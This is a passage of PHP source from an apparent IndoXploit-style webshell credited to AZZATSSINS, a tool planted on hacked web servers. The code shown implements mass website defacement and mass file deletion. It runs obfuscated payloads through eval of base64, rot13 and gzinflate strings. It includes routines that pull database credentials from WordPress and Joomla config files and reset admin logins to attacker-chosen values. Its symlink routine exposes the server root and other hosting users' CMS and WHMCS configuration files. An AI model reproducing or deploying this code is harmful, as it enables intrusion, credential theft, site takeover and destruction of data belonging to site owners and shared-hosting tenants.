703.             if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
704.                 if(is_dir($dirrall . "/" . $file)) {
705.                     $inner_files = ListFiles($dirrall . "/" . $file);
706.                     if(is_array($inner_files)) $files = array_merge($files, $inner_files);
707.                 } else {
708.                     array_push($files, $dirrall . "/" . $file);
709.                 }
710.             }
711.             }
712.  
713.             closedir($dh);
714.             return $files;
715.         }
716.     }
717.     function gass_all(){
718.         global $index ;
719.         $dirrall=$_POST['d_dir'];
720.         foreach (ListFiles($dirrall) as $key=>$file){
721.             $file = str_replace('//',"/",$file);
722.             echo "<center><strong>$file</strong> ===>";
723.             edit_file($file,$index);
724.             flush();
725.         }
726.         $key = $key+1;
727.     echo "<center><br><h3>$key Kali Anda Telah Ngecrot  Disini  </h3></center><br>"; }
728.     function sabun_massal($dir,$namafile,$isi_script) {
729.         if(is_writable($dir)) {
730.             $dira = scandir($dir);
731.             foreach($dira as $dirb) {
732.                 $dirc = "$dir/$dirb";
733.                 $lokasi = $dirc.'/'.$namafile;
734.                 if($dirb === '.') {
735.                     file_put_contents($lokasi, $isi_script);
736.                 } elseif($dirb === '..') {
737.                     file_put_contents($lokasi, $isi_script);
738.                 } else {
739.                     if(is_dir($dirc)) {
740.                         if(is_writable($dirc)) {
741.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
742.                             file_put_contents($lokasi, $isi_script);
743.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
744.                         }
745.                     }
746.                 }
747.             }
748.         }
749.     }
750.     if($_POST['mass'] == 'onedir') {
751.         echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
752.         $ini="http://";
753.         $mainpath=$_POST[d_dir];
754.         $file=$_POST[d_file];
755.         $dir=opendir("$mainpath");
756.         $code=base64_encode($_POST[script]);
757.         $indx=base64_decode($code);
758.         while($row=readdir($dir)){
759.         $start=@fopen("$row/$file","w+");
760.         $finish=@fwrite($start,$indx);
761.         if ($finish){
762.             echo"$ini$row/$file\n";
763.             }
764.         }
765.         echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
766.         $mainpath=$_POST[d_dir];$file=$_POST[d_file];
767.         $dir=opendir("$mainpath");
768.         $code=base64_encode($_POST[script]);
769.         $indx=base64_decode($code);
770.         while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
771.         $finish=@fwrite($start,$indx);
772.         if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
773.         }
774.  
775.     }
776.     elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
777.     elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
778.     elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
779.     elseif($_POST['mass'] == 'massdeface') {
780.         echo "<div style='margin: 5px auto; padding: 5px'>";
781.         sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
782.         echo "</div>";  }
783.     else {
784.         echo "
785.         <center><font style='text-decoration: underline;'>
786.         Select Type:<br>
787.         </font>
788.         <select class=\"select\" name=\"mass\"  style=\"width: 450px;\" height=\"10\">
789.         <option value=\"onedir\">Mass Deface 1 Dir</option>
790.         <option value=\"massdeface\">Mass Deface ALL Dir</option>
791.         <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
792.         <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
793.         <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
794.         <font style='text-decoration: underline;'>Folder:</font><br>
795.         <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
796.         <font style='text-decoration: underline;'>Filename:</font><br>
797.         <input type='text' name='d_file' value='azx.php' style='width: 450px;' height='10'><br>
798.         <font style='text-decoration: underline;'>Index File:</font><br>
799.         <textarea name='script' style='width: 450px; height: 200px;'>Hacked By AZZATSSINS</textarea><br>
800.         <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
801.         </form></center>";
802.         }
803.     }
804. elseif($_GET['do'] == 'zip') {
805.     echo "<center><br>";
806. function rmdir_recursive($dir) {
807.     foreach(scandir($dir) as $file) {
808.        if ('.' === $file || '..' === $file) continue;
809.        if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file");
810.        else unlink("$dir/$file");
811.    }
812.    rmdir($dir);
813. }
814. if($_FILES["zip_file"]["name"]) {
815.     $filename = $_FILES["zip_file"]["name"];
816.     $source = $_FILES["zip_file"]["tmp_name"];
817.     $type = $_FILES["zip_file"]["type"];
818.     $name = explode(".", $filename);
819.     $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed');
820.     foreach($accepted_types as $mime_type) {
821.         if($mime_type == $type) {
822.             $okay = true;
823.             break;
824.         }
825.     }
826.     $continue = strtolower($name[1]) == 'zip' ? true : false;
827.     if(!$continue) {
828.         $message = "Itu Bukan Zip  , , GOBLOK COK";
829.     }
830.   $path = dirname(__FILE__).'/';
831.   $filenoext = basename ($filename, '.zip');
832.   $filenoext = basename ($filenoext, '.ZIP');
833.   $targetdir = $path . $filenoext;
834.   $targetzip = $path . $filename;
835.   if (is_dir($targetdir))  rmdir_recursive ( $targetdir);
836.   mkdir($targetdir, 0777);
837.     if(move_uploaded_file($source, $targetzip)) {
838.         $zip = new ZipArchive();
839.         $x = $zip->open($targetzip);
840.         if ($x === true) {
841.             $zip->extractTo($targetdir);
842.             $zip->close();
843.  
844.             unlink($targetzip);
845.         }
846.         $message = "<b>Sukses Gan :)</b>";
847.     } else {   
848.         $message = "<b>Error Gan :(</b>";
849.     }
850. }  
851. echo '<table style="width:100%" border="1">
852.  <tr><td><h2>Upload And Unzip</h2><form enctype="multipart/form-data" method="post" action="">
853. <label>Zip File : <input type="file" name="zip_file" /></label>
854. <input type="submit" name="submit" value="Upload And Unzip" />
855. </form>';
856. if($message) echo "<p>$message</p>";
857. echo "</td><td><h2>Zip Backup</h2><form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br><input type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/cox_backup.zip' style='width: 450px;' height='10'><br><input type='submit' name='backup' value='BackUp!' style='width: 215px;'></form>";  
858.     if($_POST['backup']){
859.     $save=$_POST['save'];
860.     function Zip($source, $destination)
861. {
862.     if (extension_loaded('zip') === true)
863.     {
864.         if (file_exists($source) === true)
865.         {
866.             $zip = new ZipArchive();
867.  
868.             if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
869.             {
870.                 $source = realpath($source);
871.  
872.                 if (is_dir($source) === true)
873.                 {
874.                     $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
875.  
876.                     foreach ($files as $file)
877.                     {
878.                         $file = realpath($file);
879.  
880.                         if (is_dir($file) === true)
881.                         {
882.                             $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
883.                         }
884.  
885.                         else if (is_file($file) === true)
886.                         {
887.                             $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
888.                         }
889.                     }
890.                 }
891.  
892.                 else if (is_file($source) === true)
893.                 {
894.                     $zip->addFromString(basename($source), file_get_contents($source));
895.                 }
896.             }
897.  
898.             return $zip->close();
899.         }
900.     }
901.  
902.     return false;
903. }
904.     Zip($_POST['dir'],$save);
905.     echo "Done , Save To <b>$save</b>";
906.     }
907.     echo "</td><td><h2>Unzip Manual</h2><form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br><input type='text' name='dir' value='$dir/file.zip' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/cox_unzip' style='width: 450px;' height='10'><br><input type='submit' name='extrak' value='Unzip!' style='width: 215px;'></form>";
908.     if($_POST['extrak']){
909.     $save=$_POST['save'];
910.     $zip = new ZipArchive;
911.     $res = $zip->open($_POST['dir']);
912.     if ($res === TRUE) {
913.         $zip->extractTo($save);
914.         $zip->close();
915.     echo 'Succes , Location : <b>'.$save.'</b>';
916.     } else {
917.     echo 'Gagal Mas :( Ntahlah !';
918.     }
919.     }
920. echo '</tr></table><br>';  
921.     }
922.     elseif($_GET['do'] == 'shellchk') {
923.         eval(str_rot13(gzinflate(str_rot13(base64_decode(('vUdbQtswFH6v1P9jsJAapK7tNvEwdaMN1KK9WaJQe0tOlR3ZDtC5yQnO5ln89x3nUwLibi9RreTL953raoyJFcDmCWWNMhwO5pmQBWNG4OKacrJVBNcmWq8ZmFHngtMprQvUSaS0joTS18zzNN54I9FA5FmCSbgUJQGs1tHJZ7qLfxkuNKrJ3okHFQk9VlExSBadm1E2Ipu1z0s62iTCqcX798cgxR0tc+F82jgI53tM/WYexRoSdJQioor3e82Jq2oRSfsi10KGSs3+1rjYH1wRD86FI39x3ucdstPhIItsmSk8oN768LcSKWCuY5uIFINQepGCPIK/wwHQanXRQ64KFhWj2rWw0xqltNGxB0RcV8ugoXpzN3D4NIaPLTIiQ3Ek+SP+CzuWKkEAvI+cj3NnMhoTcjPy56ObHswnQdBlWmHqqzyDoI1zAR9zszaVkmybq1wL6Ynb1W35aL3csOX659nFbfvt8mW5b42hEv07QXBUS0m28gTqY4FoTnuR7l5vbZA7mXiMl95HcG8CeTjogTJY15mIkAfMGpW7ib7XeQzMsKMOLiuNBQQfPxkeA0jdEbM9OeplsJoDwgj+ENIUY+1SKOTiVyLy8LuIbOpIwjWJpYbBO5gbsBIzkhOjgDuheyEaVopLeffO8D/hs/v5tEcyWcMmxVRAp/BMe46ftef1OMlYRXup6eTF8+GHn3phHKxD3qKEtZTU34O3yKanrP/usTJScexbNExvGn4RGt6izcMB/XybZqVDB4fb87PVxXNHvUI0wp2XhQZKaIbd14qyrQnkoR34mkM+ep5upDS7oMmd3jY0iSVuSBaNqnn3lEgKr3xdDnVHTO/Of59fbA9MVur15rHNtEb1sgha7UroQ5m8LbEvzuM/'))))));
924.     } elseif($_GET['do'] == 'loghunter')
925.     {eval(str_rot13(gzinflate(str_rot13(base64_decode(("tUl7YtpVEP87VXyHiZMr0BLsPJqqgJ14QyBquuNrXEUlEExeeL2E5hZ7wS5pmu9+s7ZWgDM5RCmWJXt0f7Pz3JnJ52lphOsTQ+odbjFOjaGl1CCfWIlGTyPgLguIpQ+VoQKRYD7x8N8mDhsqC/iZRJ9DoxtDqNYDyx4xYA+20BUmvjEF7mw4wlL9WZ8J5o69b6lpcyhg8Qipju+aXkAVo35z+/az5KVGhoozmlEBilhLltbJyVCl6WULvpDx7kNE11lDpQ14NJsKY9hQKEyligc8DHNJFU8xcrXUKgRGV6hWhVooC6xMRCshRH2fz31OLQCfKtyQGVyNpOOg+DflE+hSPAhY+VyXsxRlZ6p3x+qRaWsK2sfqx3B13OZmN4E1QrZ9xuyqqkG5KyaEzCsuidTJdfbJEWEGzOYOE5PAim4j1fEJ/eSOSz7XHm5cqFE2n3bv1XwO4jeYFvfNxmyzNSgkrivclR7zuenIilALjFRpEM65SNzHY2A0nGubQ8Fdv+igZpH2sgfcAblAO6Vpj8lUPkUQYezqhVcB3r2DxaJFKL2AlvDykRjQbmRtpXt90eu0zi/+MJu9U/uijb8VuUxbclBEsBs45k+zkpS3K6iYBVLFaBylnOgI0hRL5Y3FQXRZfmiYBqEwMTNal2AkLeYk59Uya4KEVgfxLZhvd2PP9Djjmxm+i3WCbKyD0jm/ely2bV0lC8ZrMI/PSC4dTjskikOPWSQKiiRBlYk2KBQLancWQQZPKjtVNbgbxDLisK9w5ZNcjAFea4uBWE9P9T1a6/e7mtFxb8YtIi+SxYw7S8EcHX4+7R8bVxyhipKCcTHI0urpvyS8ijMz4sz1Wh6GxcLeoH3wp2nwmR/8RjF/+WNj9+FKVsElEitlvUooy9iV913ikmym133XiZ2pQbgjQUJZQrjEE5mO2peRjLGrIc0EvygbVDwqA/c8J+SOLzB2Q6kSJp0MzIZnS+ZUHcuQxS8P5vT/2KW2meKRHbey2DEnkutEuHe1GtDBZRMI6HD2F8rxaCjBjx+QTxpKDfidRgsLX/VsOyt7Mm/6IohStil49uKEetKv3+73D0KMWDsk3BP0jfIvrUvo8YG21e3o94+7mnP8FXTYGyqXptOW2vVBNe2kdNwiZh+r/Ns6D/N6WPV+vrTAT8slKBWe8WvLrREPoeMLav70RqakveP7ZuvYcdErllZIvvJ77rg0sNlJhj1PnYNCxUdCm/1rPK6MLByKKpbARIhG7ES6OQm5NTdvM7826yo34HbLiMVo85WApX0fXpBkw5+LB9CNtD7hkLPex0rFQBHbKs5S5j2nxQVCGfrXN63ehflb++a622H1zN56+/qm9OpMGzw9o09LDyIMydh1CsuTqb6lvxOKR6yiefbiK97cQF4lre4/idARGdaujmDr5XvpxPQXP/guZC3mu3GcxgGvFiMWRjD2jvXBa3biz+dp/gU="))))));}  
926. elseif($_GET['do'] == 'metu') {
927.    
928.  
929. echo '<form action="?dir=$dir&do=metu" method="post">';
930.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
931.     echo '<br><center>Bye Byee ^.^</center><br>';
932.    
933. }
934. elseif($_GET['do'] == 'about') {
935.    
936. echo '<center><font face="Bad Script" size="100%">you may think<br>you know me . . .<br><br>but, you have no idea who i am.<br><font size="100%">. AZZATSSINS .</font></font><br><hr class="style-two"><br><h4><font face="Abel" color="lime">We respect ur code<br><br><font color="#004d00">IndoXploit Webshell - AZZATSSINS - 0x1999 - m1x - All Member IndoXploit - HSH Mini Webshell<br><br>and all my friends<br><br></font>Big thx for u :)</font></h4><br></center>';
937.    
938. }
939. elseif($_GET['do'] == 'auto_cu_wp') {
940. if($_POST['gass']) {
941.     echo "<center><h1>WordPress Auto Change User 2</h1>
942.         <form method='post'>
943.         Link Config: <br>
944.         <textarea name='link' style='width: 450px; height:250px;'>";
945.     UrlLoop($_POST['linkconf'],'wordpress');   
946.     echo"</textarea><br>
947.         <input type='submit' style='width: 450px;' name='auto_cu_wp' value='Hajar!!'>
948.         </form></center>";
949. }   else {
950.         echo "<center><h1>WordPress Auto Change User 2</h1>
951.         <form method='post'>
952.         Link Config: <br>
953.         <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/iki_config_dancok/'><br>
954.         <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
955.         </form></center>";
956.     }
957. if($_POST['auto_cu_wp']) {
958.    
959.         function anucurl($sites) {
960.             $ch = curl_init($sites);
961.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
962.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
963.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
964.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
965.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
966.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
967.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
968.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
969.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
970.             $data = curl_exec($ch);
971.                   curl_close($ch);
972.             return $data;
973.         }
974.         $link = explode("\r\n", $_POST['link']);
975.         $user = "42247551N5";
976.         $pass = "42247551N5";
977.         $passx = md5($pass);
978.         foreach($link as $dir_config) {
979.             $config = anucurl($dir_config);
980.             $dbhost = ambilkata($config,"DB_HOST', '","'");
981.             $dbuser = ambilkata($config,"DB_USER', '","'");
982.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
983.             $dbname = ambilkata($config,"DB_NAME', '","'");
984.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
985.             $prefix = $dbprefix."users";
986.             $option = $dbprefix."options";
987.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
988.             $db = mysql_select_db($dbname);
989.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
990.             $result = mysql_fetch_array($q);
991.             $id = $result[ID];
992.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
993.             $result2 = mysql_fetch_array($q2);
994.             $target = $result2[option_value];
995.             if($target == '') {                
996.                 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
997.             } else {
998.                 echo "<font color=blue>[</font> $target <font color=blue>]</font></font><br>";
999.             }
1000.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1001.             if(!$conn OR !$db OR !$update) {
1002.                 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1003.                 mysql_close($conn);
1004.             } else {
1005.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1006.                     echo "[+] username: <font color=lime>$user</font><br>";
1007.                     echo "[+] password: <font color=lime>$pass</font><br><br>";    
1008.                    
1009.                 mysql_close($conn);
1010.             }
1011.         }
1012.     }  
1013.  
1014. }
1015. elseif($_GET['do'] == 'auto_cu_joomla') {
1016. if($_POST['gass']) {
1017.     echo "<center><h1>Joomla Auto Change User 2</h1>
1018.         <form method='post'>
1019.         Link Config: <br>
1020.         <textarea name='link' style='width: 450px; height:250px;'>";
1021.     UrlLoop($_POST['linkconf'],'joomla');  
1022.     echo"</textarea><br>
1023.         <input type='submit' style='width: 450px;' name='auto_cu_joomla' value='Hajar!!'>
1024.         </form></center>";
1025. }   else {
1026.         echo "<center><h1>Joomla Auto Change User 2</h1>
1027.         <form method='post'>
1028.         Link Config: <br>
1029.         <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/iki_config_dancok/'><br>
1030.         <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
1031.         </form></center>";
1032.     }
1033. if($_POST['auto_cu_joomla']) {
1034.    
1035.         function anucurl($sites) {
1036.             $ch = curl_init($sites);
1037.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1038.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1039.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1040.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1041.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1042.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1043.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1044.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1045.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
1046.             $data = curl_exec($ch);
1047.                   curl_close($ch);
1048.             return $data;
1049.         }
1050.         $link = explode("\r\n", $_POST['link']);
1051.         $user = "42247551N5";
1052.         $pass = "42247551N5";
1053.         $passx = md5($pass);
1054.         foreach($link as $dir_config) {
1055.             $config = anucurl($dir_config);
1056.                     $dbhost = ambilkata($config,"host = '","'");
1057.                     $dbuser = ambilkata($config,"user = '","'");
1058.                     $dbpass = ambilkata($config,"password = '","'");
1059.                     $dbname = ambilkata($config,"db = '","'");
1060.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
1061.                     $prefix = $dbprefix."users";
1062.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1063.                     $db = mysql_select_db($dbname);
1064.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1065.                     $result = mysql_fetch_array($q);
1066.                     $id = $result['id'];
1067.                     $site = ambilkata($config,"sitename = '","'");
1068.                     $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
1069.                     echo "Config => ".$dir_config."<br>";
1070.                     echo "CMS => Joomla<br>";
1071.                     if($site == '') {
1072.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
1073.                     } else {
1074.                         echo "Sitename => $site<br>";
1075.                     }
1076.                     if(!$update OR !$conn OR !$db) {
1077.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1078.                     } else {
1079.                         echo "Status => Done , Username : <font color=lime>$user</font> Password : <font color=lime>$pass</font><br><br>";
1080.                     }
1081.                     mysql_close($conn);
1082.                     }
1083.     }  
1084. }
1085. elseif($_GET['do'] == 'symconfig') {
1086. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
1087. echo '<script>alert("Skid this won\'t work on Windows")</script>';
1088. exit;
1089. }
1090. else
1091. {
1092. if($_POST["m"] && !$_POST["passwd"]==""){
1093. @mkdir("iki_config_dancok", 0777);
1094. @chdir("iki_config_dancok");
1095. @symlink("/","root");
1096. $htaccess="Options Indexes FollowSymLinks
1097. DirectoryIndex AZZATSSINS.htm
1098. AddType text/plain .php
1099. AddHandler text/plain .php
1100. Satisfy Any";
1101. @file_put_contents(".htaccess",$htaccess);
1102. $etc_passwd=$_POST["passwd"];
1103. $etc_passwd=explode("\n",$etc_passwd);
1104. foreach($etc_passwd as $passwd){
1105. $pawd=explode(":",$passwd);
1106. $user =$pawd[0];
1107.  
1108. @symlink('/','iki_config_dancok/root');
1109. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
1110. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
1111. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
1112. @symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
1113. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
1114. @symlink('/home/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
1115. @symlink('/home/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
1116. @symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
1117. @symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
1118. @symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
1119. @symlink('/home/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
1120. @symlink('/home/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
1121. @symlink('/home/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
1122. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
1123. @symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
1124. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
1125. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
1126. @symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
1127. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
1128. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
1129. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
1130. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
1131. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
1132. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
1133. @symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
1134. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
1135. @symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
1136. @symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
1137. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
1138. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
1139. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
1140. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
1141. @symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
1142. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
1143. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
1144. @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
1145. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
1146. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
1147. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
1148. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
1149. @symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
1150. @symlink('/home/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
1151. @symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
1152. @symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
1153. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
1154. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
1155. @symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
1156. @symlink('/home/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
1157. @symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
1158. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1159. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1160. @symlink('/home/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
1161. @symlink('/home/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
1162. @symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
1163. @symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
1164. @symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
1165. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
1166. @symlink('/home/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
1167. @symlink('/home/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
1168. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
1169. @symlink('/home/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
1170. @symlink('/home/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
1171. @symlink('/home/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
1172. @symlink('/home/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
1173. @symlink('/home/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
1174. @symlink('/home/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
1175. @symlink('/home/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
1176. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
1177. @symlink('/home/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
1178. @symlink('/home/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
1179. @symlink('/home/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
1180. @symlink('/home/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
1181. @symlink('/home/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
1182. @symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
1183. @symlink('/home/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
1184. @symlink('/home/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
1185. @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
1186. @symlink('/home/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
1187. @symlink('/home/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
1188. @symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
1189. @symlink('/home/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
1190. @symlink('/home/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
1191. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
1192. @symlink('/home/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
1193. @symlink('/home/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
1194. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
1195. @symlink('/home/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
1196. @symlink('/home/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
1197. @symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
1198. @symlink('/home/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
1199. @symlink('/home/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
1200. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
